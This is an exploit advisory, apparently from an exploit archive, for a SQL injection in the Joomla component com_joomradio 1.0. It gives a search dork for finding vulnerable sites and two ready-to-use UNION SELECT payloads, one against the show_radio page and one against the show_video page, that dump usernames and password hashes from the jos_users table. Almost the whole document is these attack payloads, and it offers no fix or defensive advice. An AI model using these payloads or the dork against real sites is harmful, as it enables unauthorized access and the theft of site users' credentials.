id: 3111
date: 06/02/2008
title: Joomla Component joomradio 1.0 (id) SQL Injection Vulnerability
author: His0k4
cves: 

===============================================================
Joomla Component joomradio 1.0 (id) SQL Injection Vulnerability
===============================================================




#########################################################
#							#
#    Joomla Component joomradio Remote SQL Injection	#
#							#
#########################################################

########################################

[*] Founded by : His0k4 (Algerian HaCkeR);
[*] Greetz :     All friends & muslims HaCkeRs  :) 

########################################

[*] Script_Name: "Joomla"
[*] Component_Name: "com_joomradio"

########################################

[*] DORK: inurl:com_joomradio

########################################

[*] P.O.C 1: /index.php?option=com_joomradio&page=show_radio&id={SQL}
[*] Example: /index.php?option=com_joomradio&page=show_radio&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--

[*] P.O.C 2: /index.php?option=com_joomradio&page=show_video&id={SQL}
[*] Example: /index.php?option=com_joomradio&page=show_video&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--
########################################



#  0day.today [2023-03-23]  #